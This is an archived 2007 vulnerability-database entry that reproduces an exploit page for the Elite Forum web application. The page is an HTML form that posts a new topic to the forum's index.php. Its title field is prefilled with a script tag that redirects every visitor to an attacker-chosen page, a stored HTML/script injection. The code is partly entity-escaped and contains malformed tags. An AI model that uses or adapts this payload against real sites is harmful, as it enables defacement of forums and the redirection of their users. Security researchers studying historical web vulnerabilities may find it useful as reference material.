Elite Forum Full HTML ENject versin 1.0.0.0

2007-07-22T00:00:00
ID SECURITYVULNS:DOC:17566
Type securityvulns
Reporter Securityvulns
Modified 2007-07-22T00:00:00

Description

c0ded: St@rExT From : Turkey exploit:

<title>Elite Forum FULL HTML ENjocter-By St@rEXT</title> <style> body{background:url(http://img523.imageshack.us/img523/7704/turkeyflag0xuhz9zc7uf0.jpg); color:#FFFFFF; font-weight:bold;} input{ background-color:darkred; color:#FFFFFF; font-weight:bold; } </style <form method=POST action="http://site/path/index.php?act=ptopic&fid=1" target=_blank> <b><em><h2><b>Elite Forum FULL HTML ENjocter-By St@rEXT</b></h2></em></b></font> <br>

    &lt;b&gt;Your HTML C0de : &lt;br&gt;&lt;/b&gt; 
    &lt;input  size=&quot;60&quot; type=&quot;text&quot;  name=&quot;title&quot; value=&#39;&lt;script&gt;location=&quot;http://yourindex.html&quot;&lt;/script&gt;&#39;&gt;

    &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;b&gt;Forum Messages:&lt;/b&gt;&lt;BR&gt;

    &lt;input cols=2 rows=1 name=&#39;post&#39;value=&#39;Bug On!!!&#39;&gt;&lt;BR&gt;&lt;BR&gt;&lt;br&gt;

<input type=submit value="Send and Hacked"> <BR><BR>

    &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
    &lt;/form&gt;